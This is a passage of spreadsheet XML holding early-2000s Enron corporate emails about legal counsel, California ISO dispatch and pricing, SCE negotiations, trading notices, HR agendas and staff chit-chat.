    <t>Thu, 21 Sep 2000 02:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Bermudean Counsel</t>
  </si>
  <si>
    <t xml:space="preserve">Paul,_x000D_
_x000D_
I just spoke to Brent Hendry who worked on the Bermuda law advice, and he _x000D_
said he sent you the name of counsel.  I will also sent to you tonight a copy _x000D_
of the advice we just got with respect to derivative transactions and online _x000D_
transactions._x000D_
_x000D_
_x000D_
_x000D_
	Paul Simons_x000D_
	09/21/2000 06:11 AM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: Mark Taylor/HOU/ECT@ECT_x000D_
		 Subject: Bermudean Counsel_x000D_
_x000D_
Tana_x000D_
_x000D_
I need to use Bermudean counsel today on a transaction and understand we have _x000D_
recently selected Bermudan counsel re EOL.  Please could you provide me with _x000D_
contact details._x000D_
_x000D_
Many thanks and kind regards._x000D_
_x000D_
Paul_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Sep 2000 01:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">My view is that we can't associated ourselves with IEP anymore.  They are _x000D_
generators, who now where the black hat.  If we are going to participate, we _x000D_
need to do it with some protections.  </t>
  </si>
  <si>
    <t>Wed, 30 May 2001 14:10:49 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bill.williams@enron.com', 'h..foster@enron.com'})</t>
  </si>
  <si>
    <t>FW: Question</t>
  </si>
  <si>
    <t xml:space="preserve">This is what I think.  I'll let you know when I get confirmation._x000D_
_x000D_
Keoni Almeida_x000D_
California Independent System Operator_x000D_
phone: 916/608-7053_x000D_
pager:  916/814-7352_x000D_
alpha page:  9169812000.1151268@pagenet.net_x000D_
e-mail:  &lt;mailto:kalmeida@caiso.com&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Almeida, Keoni_x000D_
Sent: Wednesday, May 30, 2001 1:29 PM_x000D_
To: Ford, Greg_x000D_
Subject: FW: Question_x000D_
_x000D_
_x000D_
My response to the questions would be that they get the proxy price during_x000D_
the mitigated intervals when they do not have a bid in.  If they have a bid_x000D_
in, they get the higher of the proxy or the bid and they submit the cost_x000D_
justification to FERC.  Right?_x000D_
Who do they send cost justification to?_x000D_
_x000D_
Keoni Almeida_x000D_
California Independent System Operator_x000D_
phone: 916/608-7053_x000D_
pager:  916/814-7352_x000D_
alpha page:  9169812000.1151268@pagenet.net_x000D_
e-mail:  &lt;mailto:kalmeida@caiso.com&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Foster, Chris H. [mailto:Chris.H.Foster@ENRON.com]_x000D_
Sent: Wednesday, May 30, 2001 1:21 PM_x000D_
To: KAlmeida@caiso.com_x000D_
Cc: tbarringer@edisonmission.com; Scott Hawley (E-mail); Cocke Jr.,_x000D_
Stanley; Comnes, Alan_x000D_
Subject: FW: Question_x000D_
_x000D_
_x000D_
Keoni:_x000D_
_x000D_
In addition to my questions below, can you clarify what we get paid when_x000D_
we are inc'd pursuant to the FERC Order?  Is the proxy the inc? If we do_x000D_
not have a bid in, do we get the inc?  If we have a supplemental bid in,_x000D_
do we get the higher of the inc or the bid?   If we do get the higher_x000D_
of, to whom do we send our cost data?_x000D_
_x000D_
Chris_x000D_
_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From: 	Foster, Chris H._x000D_
&gt; Sent:	Wednesday, May 30, 2001 12:53 PM_x000D_
&gt; To:	'"Almeida, Keoni" &lt;KAlmeida@caiso.com&gt;@ENRON'_x000D_
&gt; Cc:	Nelson, Kourtney; Comnes, Alan; Stokley, Chris_x000D_
&gt; Subject:	RE: Question_x000D_
&gt;_x000D_
&gt; K:_x000D_
&gt;_x000D_
&gt; I wanted to document what just happened on receiving a dispatch_x000D_
&gt; instruction from the ISO for Harbor Cogen (harbgn_7_units).   At 12:20_x000D_
&gt; we received a dispatch instruction from he ISO due to the Stage 1_x000D_
&gt; emergency.  The request was for 1 MW from Tosco and 27 MW from Harbor._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; As you know, we are no longer the SC for Tosco and have sent you the_x000D_
&gt; required documentation.  Can you make sure the ISO has this in their_x000D_
&gt; system?_x000D_
&gt;_x000D_
&gt; With respect to Harbor, we were running 60 MW and were inc'd 27,_x000D_
&gt; indicating a request for a total of 87 MW.  We already had an approved_x000D_
&gt; outage request from the ISO as indicated by the fax I sent you_x000D_
&gt; indicating that Harbor only had 80 MW available.  So, the ISO should_x000D_
&gt; only have been able to dispatch 20 MW._x000D_
&gt;_x000D_
&gt; We initially declined the dispatch instruction from the ISO due to the_x000D_
&gt; errors the ISO made and the confusion it caused us.  We immediately_x000D_
&gt; "hit the phones" to clarify the facts and subsequently inc'd_x000D_
&gt; generation to 80 MW by 12:45.  Why did the ISO dispatch group not have_x000D_
&gt; our outage request indicating a maximum of 80 MW?_x000D_
&gt;_x000D_
&gt; We believe we have completely responded to the ISO's instruction and_x000D_
&gt; should have no penalty charges.  Please let me know the settlement_x000D_
&gt; implications of this confusion event._x000D_
&gt;_x000D_
&gt; Thanks_x000D_
&gt;_x000D_
&gt; Chris_x000D_
&gt;_x000D_
&gt; </t>
  </si>
  <si>
    <t>Fri, 2 Feb 2001 07:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Teeth</t>
  </si>
  <si>
    <t xml:space="preserve">So all those West Virginia stereotypes are true after all!!!  I think all my _x000D_
family has their own teeth.  Even my grandparents have their own teeth.  You _x000D_
know I always thought I had good family stories, but you definitely outrank _x000D_
me there.  _x000D_
_x000D_
Have a good weekend. _x000D_
Robin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Becky Pitre_x000D_
02/02/2001 03:22 PM_x000D_
To: Robin Rodrigue/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Teeth_x000D_
_x000D_
Something else weird about my sister and her daughter ( the ones who live in _x000D_
the sticks in W.Va.).  They both had all of their teeth pulled and then got _x000D_
dentures.  Janey is 46 and Missy is 24 years old.  Isn't that icky?  Missy _x000D_
told me that she liked her dentures because her teeth no longer hurt!  And my _x000D_
sister, I hate to admit this, says she likes them because she can take them _x000D_
out and clean them every few days!  Dang!  If they had used good, or even _x000D_
fair, hygiene then they could still have their real teeth.  So, brush, brush, _x000D_
brush._x000D_
Now that you have picked yourself up off of the floor, stop laughing!_x000D_
Do you have a family story to top this one?  Hope not._x000D_
Becky_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 06:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'steve.swain@enron.com'})</t>
  </si>
  <si>
    <t>I can make the call, let me know call in #.  Thanks._x000D_
_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From: 	Steffes, James D.  _x000D_
&gt; Sent:	Monday, October 29, 2001 6:12 AM_x000D_
&gt; To:	Dasovich, Jeff; Mara, Susan; Tribolet, Michael; _x000D_
&gt; Mellencamp, Lisa; Curry, Wanda; Williams, Robert C.; Mike Day _x000D_
&gt; (E-mail); Swain, Steve_x000D_
&gt; Cc:	Noske, Linda J.; Shapiro, Richard; Sanders, Richard B.; _x000D_
&gt; Sharp, Vicki_x000D_
&gt; Subject:	FW: Proposed SCE Negotiation Strategy - MEETING _x000D_
&gt; TODAY AT 2pm Houston Time_x000D_
&gt; _x000D_
&gt; To discuss this outline and our issues list, can people _x000D_
&gt; attend a 2pm Houston Time call.  The meet and confer may be _x000D_
&gt; on-going, but maybe either Jeff or Sue can jump off._x000D_
&gt; _x000D_
&gt; Linda Noske will be sending out a call-in number._x000D_
&gt; _x000D_
&gt; Thanks,_x000D_
&gt; _x000D_
&gt; Jim_x000D_
&gt; _x000D_
&gt;  -----Original Message-----_x000D_
&gt; From: 	Steffes, James D.  _x000D_
&gt; Sent:	Monday, October 29, 2001 8:04 AM_x000D_
&gt; To:	Dasovich, Jeff; Mara, Susan; Tribolet, Michael; _x000D_
&gt; Mellencamp, Lisa; Curry, Wanda; Williams, Robert C.; Mike Day (E-mail)_x000D_
&gt; Cc:	Shapiro, Richard; Sanders, Richard B.; Sharp, Vicki_x000D_
&gt; Subject:	Proposed SCE Negotiation Strategy_x000D_
&gt; _x000D_
&gt; Following last week's meeting, here is my recommendation on _x000D_
&gt; how to proceed with SCE._x000D_
&gt; _x000D_
&gt; 1.	Form Enron Negotiation Team_x000D_
&gt; _x000D_
&gt; 	My recommendation is to use the same team we used with _x000D_
&gt; PG&amp;E + Jeff Dasovich.  My understanding was that Lisa M. was _x000D_
&gt; the lead negotiator - I would not change this.  Jeff should _x000D_
&gt; only be there to make introductions._x000D_
&gt; _x000D_
&gt; 2.	Meet &amp; Confer (10/29)_x000D_
&gt; _x000D_
&gt; 	Sue Mara and Jeff Dasovich will listen and report back _x000D_
&gt; to everyone on what happens.  _x000D_
&gt; _x000D_
&gt; 3.	Reformed Stipulation_x000D_
&gt; _x000D_
&gt; 	I would propose that we take a wait and see approach to _x000D_
&gt; this document.  Based on Dasovich's idea to get together with _x000D_
&gt; SCE on Thursday, maybe let this ride._x000D_
&gt; _x000D_
&gt; 4.	Meeting_x000D_
&gt; _x000D_
&gt; 	My understanding is that (Jeff D. please correct) SCE _x000D_
&gt; can meet with us this Thursday.  Can everyone make it that _x000D_
&gt; needs to be there?  Probably meet in California.  We should _x000D_
&gt; put the laundry list on the table._x000D_
&gt; _x000D_
&gt; Please let me know what else we need to discuss or if anyone _x000D_
&gt; disagrees._x000D_
&gt; _x000D_
&gt; Thanks,_x000D_
&gt; _x000D_
&gt; Jim</t>
  </si>
  <si>
    <t>Sun, 29 Jul 2001 15:05:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'heather.kroll@enron.com', 'joseph.deffner@enron.com'})</t>
  </si>
  <si>
    <t>AIG/Alamac</t>
  </si>
  <si>
    <t>I plan on speaking with all the interested bidders in the morning to determine the big issues from a valuation perspective.  Thus far, almost every one has highlighted the recent decline in power prices (none bidders said size was an issue).  Once I have spoken with the bidders, we need to agree on the process of getting back to AIG._x000D_
_x000D_
Let me know if you all have any thoughts._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Don</t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 05:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Mtg w/Dennis Thompson</t>
  </si>
  <si>
    <t xml:space="preserve">See attached summary of 1/8 meeting with Dennis Thompson, Don Hollingsworth's _x000D_
Special Projects Director. </t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 04:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'peterthompson@akllp.com', 'ppipitone@andrews-kurth.com'})</t>
  </si>
  <si>
    <t>ABB/GE</t>
  </si>
  <si>
    <t>Gentlemen,_x000D_
_x000D_
Things are heating up, no pun intended. Therefore, it would be helpful if you _x000D_
would prepare a closing list for the GE turbines moving out of WestLB.  I _x000D_
know it is short, but I thrive on lists._x000D_
_x000D_
I cannot tell you how many calls I've swapped with ABB's rep about that _x000D_
contract, without ever hooking up.  I see that we will be facing a fire drill _x000D_
quickly in getting at least some of these transformers into the right _x000D_
financing vehicle.  Therefore, please prepare a list of site specific issues _x000D_
for that document as well._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 08:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Unocal WAHA Storage</t>
  </si>
  <si>
    <t xml:space="preserve">Ned,_x000D_
_x000D_
Regarding the Waha storage, the west desk does not have a strong need for _x000D_
this storage but we are always willing to show a bid based on the current _x000D_
summer/winter spreads and cycling value.  The following assumptions were made _x000D_
to establish our bid:  5% daily injection capacity, 10% daily withdrawal _x000D_
capacity, 1% fuel (injection only), 0.01/MMBtu variable injection and _x000D_
withdrawal fees.  Also an undiscounted  June 01 to January 02 spread of $0.60 _x000D_
existed at the time of this bid._x000D_
_x000D_
Bid for a 1 year storage contract beginning June 01 based on above _x000D_
assumptions:  $0.05/ MMBtu/Month ($0.60/Year).  Demand charges only._x000D_
_x000D_
I am not sure if this is exactly what you need or not.  Please call or email _x000D_
with comments._x000D_
_x000D_
Phillip Allen_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 Jan 2002 20:56:30 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/24/02; HourAhead hour: 19;  HourAhead schedule download failed. Manual intervention required.</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 07:20:33 -0700 (PDT)</t>
  </si>
  <si>
    <t>New Power Products</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
New Power Products on ICE!!_x000D_
_x000D_
On Friday, October 26 IntercontinentalExchange will launch Hourly Power as =_x000D_
well as 2nd, 3rd, 4th Week strips.  The Hourly Power will be offered for al=_x000D_
l the West Power hubs and for PJM in the East.  These new markets will have=_x000D_
 to be manually added to portfolios.  The 2nd, 3rd, 4th Week strips will be=_x000D_
 available for all Power hubs currently available on the Exchange and will =_x000D_
be automatically added to portfolios containing the Next Day strip for a pa=_x000D_
rticular hub._x000D_
_x000D_
Credit must be set under the Financial Power credit filter for the PJM Hour=_x000D_
ly and under the Power credit filter for the West Hourly markets.  Hourly P=_x000D_
ower markets can be arranged in chronological order in the Portfolio Editor=_x000D_
 window.  Please call your ICE representative if assistance is needed._x000D_
_x000D_
Any other questions or concerns should be directed to our 24 hour Help Desk=_x000D_
 at  770-738-2101._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                        =20_x000D_
_x000D_
_x000D_
_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                        </t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 15:08:37 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rakesh.bharati@enron.com', 'j.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>Update on Operational Risk Meeting</t>
  </si>
  <si>
    <t>Vince/Rakesh,_x000D_
_x000D_
I attended the Operational Risk meeting today that went on for almost 3 hours.  Other attendees were: _x000D_
Andrew Parson (IT and assurance)_x000D_
Mark Walker (Investment Valuation)_x000D_
John Sorrelis (from AA)_x000D_
Shawn from asset valuation, _x000D_
and Wanda Curry_x000D_
_x000D_
It was a general brainstorming session on what constitutes operationl risk, and how we can try to measure it within the organization.  The initial step will be to come up with the key risk indicators.  An initial list will be worked out by Mark and Andrew for further discussions. There is also an AA model that will be discussed to come up with what should be done at Enron._x000D_
_x000D_
Currently we will be going with a qualitative approach based on the key indicators developed.  Over time we would go with the standardized approach._x000D_
_x000D_
Mark was very interested in discussing the model he has developed for quantifying operational risk.  A meeting to discuss that with the Research group will be held next week, and I will get an appropriate date for that.  Wanda very much wanted you to attend, Vince.  _x000D_
_x000D_
We can talk on Friday or early next week on what our participation should be._x000D_
_x000D_
Regards,_x000D_
Sandeep.</t>
  </si>
  <si>
    <t>Wed, 21 Jun 2000 08:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>$4.35 by $4.365</t>
  </si>
  <si>
    <t>Fri, 30 Jun 2000 09:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.haedicke@enron.com', 'joe.kishkill@enron.com', 'marty.sunde@enron.com', 'wes.colwell@enron.com', 'jeffrey.shankman@enron.com', 'raymond.bowen@enron.com', 'george.mcclellan@enron.com', 'dan.leff@enron.com', 'brian.redmond@enron.com', 'jeff.donahue@enron.com', 'julia.murray@enron.com', 'john.lavorato@enron.com', 'janet.dietrich@enron.com', 'sally.beck@enron.com', 'gary.hickerson@enron.com', 'jere.overdyke@enron.com'})</t>
  </si>
  <si>
    <t>ENA Final Mid-Year PRC</t>
  </si>
  <si>
    <t xml:space="preserve"> Following is the agenda for the July 7 ENA PRC meeting at the  Doubletree _x000D_
Hotel, Granger B room:_x000D_
_x000D_
_x000D_
  8:00-9:00am    Talent Discussion_x000D_
_x000D_
 9:00-9:30am    Review Performance Distribution below Vice President _x000D_
     _x000D_
 9:30-10:00     Review promotion recommendations, Manager and above only _x000D_
_x000D_
 10:00am-??   Preview Vice Presidents as follows (all are to  be preranked):_x000D_
       Technical_x000D_
       Specialized Technical_x000D_
       Commercial Support_x000D_
      Commercial_x000D_
_x000D_
 Please feel free to contact Cindy Skinner, X30693 or David Oxley, X33557 _x000D_
regarding any questions._x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 Aug 2000 04:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'benjamin.rogers@enron.com', 'elizabeth.sprich@marriott.com', 'thdiaman@sordoni.com', 'pfarinas@tvsa.com', 'michelle.sautter@ibx.com', 'sncd@erols.com', 'clukawski@hitt-gc.com', 'jrainville@email.women.com', 'jverre99@hotmail.com', 'mdorgan@celestica.com', 'lconte@hearst.com', 'jpenney@hollandlessard.com', 'miorii@aol.com'})</t>
  </si>
  <si>
    <t>goto and sign on:_x000D_
_x000D_
CUA alumni directory_x000D_
_x000D_
http://alumni.cua.edu/gen/registration.cfm?choice=profile_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mike Gioffre_x000D_
dgioffre@hotmail.com_x000D_
_x000D_
_________________________________________________________________________x000D_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 01:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeremy.morris@enron.com', 'chris.mallory@enron.com', 'phillip.platter@enron.com', 'carla.hoffman@enron.com', 'jeff.richter@enron.com'})</t>
  </si>
  <si>
    <t>Re: Final Name Change/Merger Notification 11/00</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kate Symes/PDX/ECT on 11/21/2000 09:15 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Monica Lande_x000D_
11/20/2000 02:25 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Final Name Change/Merger Notification 11/00  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Cheryl Johnson@ENRON_x000D_
11/20/2000 02:29 PM_x000D_
To: Laurel Adams/HOU/ECT@ECT, Amelia Alland/HOU/ECT@ECT, Lauri A _x000D_
Allen/HOU/ECT@ECT, Bridgette Anderson/Corp/Enron@ENRON, Arfan _x000D_
Aziz/LON/ECT@ECT, Cyndie Balfour-Flanagan/Corp/Enron@ENRON, Edward D _x000D_
Baughman/HOU/ECT@ECT, Kimberlee A Bennick/HOU/ECT@ECT, Lisa Berg _x000D_
Carver/HOU/ECT@ECT, Anne Bike/Corp/Enron@Enron, Georgia _x000D_
Blanchard/HOU/ECT@ECT, Jennifer Blay/HOU/ECT@ECT, Fred Boas/HOU/ECT@ECT, Bob _x000D_
Bowen/HOU/ECT@ECT, Debbie R Brackett/HOU/ECT@ECT, Linda S Bryan/HOU/ECT@ECT, _x000D_
Lesli Campbell/HOU/ECT@ECT, Anthony Campos/HOU/ECT@ECT, Sylvia A _x000D_
Campos/HOU/ECT@ECT, Nella Cappelletto/CAL/ECT@ECT, Cary M _x000D_
Carrabine/HOU/ECT@ECT, Clem Cernosek/HOU/ECT@ECT, Pat _x000D_
Clynes/Corp/Enron@ENRON, Marilyn Colbert/HOU/ECT@ECT, Brad _x000D_
Coleman/HOU/ECT@ECT, Donna Consemiu/HOU/ECT@ECT, Robert Cotten/HOU/ECT@ECT, _x000D_
Mike Croucher/HOU/ECT, Romeo D'Souza/HOU/ECT@ECT, Shonnie Daniel/HOU/ECT@ECT, _x000D_
Cheryl Dawes/CAL/ECT@ECT, Sherry Dawson/NA/Enron@Enron, Rhonda L _x000D_
Denton/HOU/ECT@ECT, Russell Diamond/HOU/ECT@ECT, Stacy E Dickson/HOU/ECT@ECT, _x000D_
Bradley Diebner/HOU/ECT@ECT, Cheryl Dudley/HOU/ECT@ECT, Michael _x000D_
Eiben/HOU/ECT@ECT, Susan Elledge/NA/Enron@Enron, Faye Ellis/HOU/ECT@ECT, _x000D_
Diane Ellstrom/HOU/ECT@ECT, Veronica Espinoza/Corp/Enron@ENRON, Enron Europe _x000D_
Global Contracts and Facilities, Enron Europe Global CounterParty, Daren J _x000D_
Farmer/HOU/ECT@ECT, Jacquelyn Farriel/GPGFIN/Enron@ENRON, Genia _x000D_
FitzGerald/HOU/ECT@ECT, Irene Flynn/HOU/ECT@ECT, Shawna Flynn/HOU/ECT@ECT, _x000D_
Susan Flynn/HOU/ECT@ECT, Hoong P Foon/HOU/ECT@ECT, Rebecca Ford/HOU/ECT@ECT, _x000D_
Randall L Gay/HOU/ECT@ECT, Camille Gerard/Corp/Enron@ENRON, Scotty _x000D_
Gilbert/TOR/ECT@ECT, Lisa Gillette/HOU/ECT@ECT, Carolyn Gilley/HOU/ECT@ECT, _x000D_
Winston Goodbody/HOU/ECT@ECT, Amita Gosalia/LON/ECT@ECT, Mary G _x000D_
Gosnell/HOU/ECT@ECT, Melissa Graves/HOU/ECT@ECT, Andrea R _x000D_
Guillen/HOU/ECT@ECT, Sanjeev Gupta/NA/Enron@ENRON, David Hardy/LON/ECT@ECT, _x000D_
Bill D Hare/HOU/ECT@ect, Kenneth M Harmon/HOU/ECT@ECT, Tony _x000D_
Harris/HOU/ECT@ECT, Peggy Hedstrom/CAL/ECT@ECT, Elizabeth L _x000D_
Hernandez/HOU/ECT@ECT, Brenda F Herod/HOU/ECT@ECT, Marlene _x000D_
Hilliard/HOU/ECT@ect, Liz Hillman/Corp/Enron@Enron, Nathan L _x000D_
Hlavaty/HOU/ECT@ECT, Jim Homco/HOU/ECT@ECT, Cindy Horn/LON/ECT@ECT, Larry Joe _x000D_
Hunter/HOU/ECT@ECT, Rahil Jafry/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT, _x000D_
Katherine L Kelly/HOU/ECT@ECT, Nanette Kettler/HOU/ECT@ECT, Troy _x000D_
Klussmann/HOU/ECT@ECT, Victor Lamadrid/HOU/ECT@ECT, Karen _x000D_
Lambert/HOU/ECT@ECT, Gary W Lamphier/HOU/ECT@ECT, Kristian J _x000D_
Lande/HOU/ECT@ECT, Monica Lande/PDX/ECT@ECT, Elsie Lew/HOU/ECT@ECT, Andrew H _x000D_
Lewis/HOU/ECT@ECT, Jim Little/HOU/ECT@ECT, Kori Loibl/HOU/ECT@ECT, Scott F _x000D_
Lytle/HOU/ECT@ECT, Matilda Machado/CAL/ECT@ECT, Hillary _x000D_
Mack/Corp/Enron@Enron, Richard C McKeel/HOU/ECT@ECT, Nidia _x000D_
Mendoza/HOU/ECT@ECT, Carey M Metz/HOU/ECT@ECT, Julie Meyers/HOU/ECT@ECT, _x000D_
Richard A Miley/HOU/ECT@ECT, Bruce Mills/Corp/Enron@ENRON, Patrice L _x000D_
Mims/HOU/ECT@ECT, Glenda D Mitchell/HOU/ECT@ECT, Jason Moore/HOU/ECT@ECT, Tom _x000D_
E Moore/HOU/ECT@ECT, Jackie Morgan/HOU/ECT@ECT, Michael W Morris/HOU/ECT@ECT, _x000D_
Gary Nelson/HOU/ECT@ECT, Tracy Ngo/PDX/ECT@ECT, Debbie Nicholls/LON/ECT@ECT, _x000D_
John L Nowlan/HOU/ECT@ECT, Frank Ortiz/EPSC/HOU/ECT@ECT, B Scott _x000D_
Palmer/HOU/ECT@ECT, Stephanie Panus/NA/Enron@Enron, Anita K _x000D_
Patton/HOU/ECT@ECT, Regina Perkins/Enron Communications@Enron Communications, _x000D_
Debra Perlingiere/HOU/ECT@ECT, Richard Pinion/HOU/ECT@ECT, Sylvia S _x000D_
Pollan/HOU/ECT@ECT, John D Powell/HOU/ECT@ECT, Brent A Price/HOU/ECT@ECT, _x000D_
Cyril Price/HOU/ECT@ECT, Claudia Clark/HOU/ECT@ECT, Dale Neuner/HOU/ECT@ECT, _x000D_
EOL Call Center, Fiona Skinner/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Frank L _x000D_
Davis/HOU/ECT@ECT, Jennifer deBoisblanc Denny/HOU/ECT@ECT, Joshua _x000D_
Meachum/NA/Enron@ENRON, Justin Timothy/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Karen O'Day/NA/Enron@Enron, Keith Clark/Corp/Enron@Enron, Lisa _x000D_
Lees/HOU/ECT@ECT, Matt Motsinger/HOU/ECT@ECT, Melba Lozano/HOU/ECT@ECT, Noel _x000D_
Petterson/Corp/Enron@Enron, Peter Berzins/NA/Enron@Enron, Robert B _x000D_
Cass/HOU/ECT@ECT, Rousseau Anai/AP/Enron@Enron, Sheri Thomas/HOU/ECT@ECT, _x000D_
Simone La Rose/HOU/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, Tara _x000D_
Sweitzer/HOU/ECT@ECT, Torrey Moorer/HOU/ECT@ECT, Joan Quick/HOU/ECT@ECT, _x000D_
Dutch Quigley/HOU/ECT@ECT, Leslie Reeves/HOU/ECT@ECT, Donald P _x000D_
Reinhardt/HOU/ECT@ECT, Brant Reves/HOU/ECT@ECT, Stacey _x000D_
Richardson/HOU/ECT@ECT, Oscar Rivera/NA/Enron@Enron, Suzy Robey/HOU/ECT@ECT, _x000D_
Bernice Rodriguez/HOU/ECT@ECT, Carlos J Rodriguez/HOU/ECT@ECT, Sam _x000D_
Round/HOU/ECT@ECT, Marilyn M Schoppe/HOU/ECT@ECT, Samuel Schott/HOU/ECT@ECT, _x000D_
Brad Schneider/Corp/Enron@Enron, James Scribner/Corp/Enron@Enron, Dianne _x000D_
Seib/CAL/ECT@ECT, Cris Sherman/HOU/ECT@ECT, John Sherriff/LON/ECT@ECT, James _x000D_
Shirley/HOU/EES@EES, Lynn E Shivers/HOU/ECT@ECT, Michele Small/LON/ECT@ECT, _x000D_
Mary M Smith/HOU/ECT@ECT, Susan Smith/HOU/ECT@ECT, Jefferson D _x000D_
Sorenson/HOU/ECT@ECT, Carrie Southard/LON/ECT@ECT, Willie _x000D_
Stewart/HOU/ECT@ECT, Geoff Storey/HOU/ECT@ECT, Colleen Sullivan/HOU/ECT@ECT, _x000D_
John Suttle/HOU/ECT@ECT, Connie Sutton/HOU/ECT@ECT, James _x000D_
Scribner/Corp/Enron@Enron, Vance L Taylor/HOU/ECT@ECT, Edward _x000D_
Terry/HOU/ECT@ECT, Kim S Theriot/HOU/ECT@ECT, Veronica _x000D_
Thompson/GPGFIN/Enron@ENRON, Mark D Thorne/HOU/ECT@ECT, Philippe _x000D_
Travis/LON/ECT@ECT, Susan D Trevino/HOU/ECT@ECT, Laura _x000D_
Vargas/Corp/Enron@ENRON, Claire Viejou/LON/ECT@ECT, Elsa _x000D_
Villarreal/HOU/ECT@ECT, Robert Walker/HOU/ECT@ECT, George _x000D_
Weissman/HOU/ECT@ECT, Karin Williams/HOU/EES@EES, Sony Wilson/HOU/ECT@ECT, _x000D_
O'Neal D Winfree/HOU/ECT@ECT, Christa Winfrey/HOU/ECT@ECT, Jeremy _x000D_
Wong/HOU/ECT@ECT, Rita Wynne/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Final Name Change/Merger Notification 11/00_x000D_
_x000D_
Attached is the Preliminary Name Change/Merger notification report for Nov. _x000D_
2000.  The final list with any additions will go out on Wed, Nov 22.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Name overlays will be done today, Mon, Nov. 20, right after notification is _x000D_
given, and shortname changes will be done on Wed, Nov. 22. _x000D_
_x000D_
_x000D_
Records on this report will be inactivated on Fri.,  Dec. 1._x000D_
_x000D_
                _x000D_
HAPPY THANKSGIVING!_x000D_
_x000D_
Cheryl x3-3103_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 9 Sep 2001 16:55:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron in Action 09.10.01</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
_x000D_
Enron in Action can be accessed through the new Community Relations web site at http://cr.enron.com/eia.html .  In this week's issue you will find out information regarding:_x000D_
_x000D_
Enron Happenings _x000D_
The Lion King Advanced Ticket Sales_x000D_
Enron Running Club Events_x000D_
Houston Partnership Walk 2001_x000D_
Museum of Fine Arts 2001-2002 Membership Drive_x000D_
2001 MS Walk_x000D_
The College Fund / UNCF Walk-A-Thon_x000D_
4th Annual Energize Houston Golf Tournament_x000D_
_x000D_
Involved Employees_x000D_
Par "Fore" Pets Golf Tournament_x000D_
OPA!  It's Greek Festival Time_x000D_
Dragon Boat Racing on Buffalo Bayou_x000D_
Beginner Ballroom Dance Lessons_x000D_
_x000D_
Volunteer Opportunities_x000D_
Junior Achievement Volunteer Opportunities_x000D_
Juvenile Diabetes Research Foundation_x000D_
Race for the Cure_x000D_
Enron Running Club_x000D_
CROSSROADS: Mentor a Troubled Child Brown Bag_x000D_
City Wide Clubs 23rd Annual Thanksgiving Feast_x000D_
_x000D_
Wellness_x000D_
September "Fall Fiesta" at the Body Shop Fitness Center_x000D_
Fall 2001 Fashion Show and Luncheon_x000D_
Bella Rinova Spa at the Downtown Club (Met)_x000D_
Blood Drive_x000D_
_x000D_
